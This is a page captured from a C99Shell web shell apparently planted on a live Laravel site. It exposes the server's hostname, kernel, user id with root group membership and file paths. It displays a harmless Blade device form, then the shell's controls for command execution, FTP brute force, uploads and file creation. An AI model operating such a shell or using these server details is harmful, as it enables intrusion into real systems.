!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/test.gateway.picotech.app/public_html/resources/views/customer/device/   drwxr-xr-x
Free 29.22 GB of 117.98 GB (24.76%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     form.blade.php (1.73 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="row">
    <div class="from-group col-lg-6 col-xl-6 col-md-6 col-sm-12">
        <label for="">{{trans('customer.device_name')}}</label>
        <input type="text" class="form-control" name="name" value="{{isset($device)?$device->name:(old('name')?old('name'):'')}}">
    </div>

    <div class="from-group col-lg-6 col-xl-6 col-md-6 col-sm-12">
        <label for="">{{trans('customer.device_model')}}</label>
        <input type="text" {{isset($device)?'readonly':''}} class="form-control" name="model" value="{{isset($device)?$device->model:(old('model')?old('model'):'')}}">
    </div>

    <div class="from-group mt-3 col-lg-4 col-xl-4 col-md-4 col-sm-12">
        <label for="">{{trans('customer.android_v')}}</label>
        <input type="text" class="form-control" {{isset($device)?'readonly':''}} name="android_version" value="{{isset($device)?$device->android_version:(old('android_version')?old('android_version'):'')}}">
    </div>

    <div class="from-group mt-3 col-lg-4 col-xl-4 col-md-4 col-sm-12">
        <label for="">{{trans('customer.app_v')}}</label>
        <input type="text" class="form-control" {{isset($device)?'readonly':''}} name="app_version" value="{{isset($device)?$device->app_version:(old('app_version')?old('app_version'):'')}}">
    </div>

    <div class="from-group mt-3 col-lg-4 col-xl-4 col-md-4 col-sm-12">
        <label for="">{{trans('customer.status')}}</label>
        <select name="status" class="form-control" id="status">
            <option {{isset($device) && $device->status=='active'?'selected':''}} value="active">{{trans('Active')}}</option>
            <option {{isset($device) && $device->status=='inactive'?'selected':''}} value="inactive">{{trans('Inactive')}}</option>
        </select>
    </div>
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--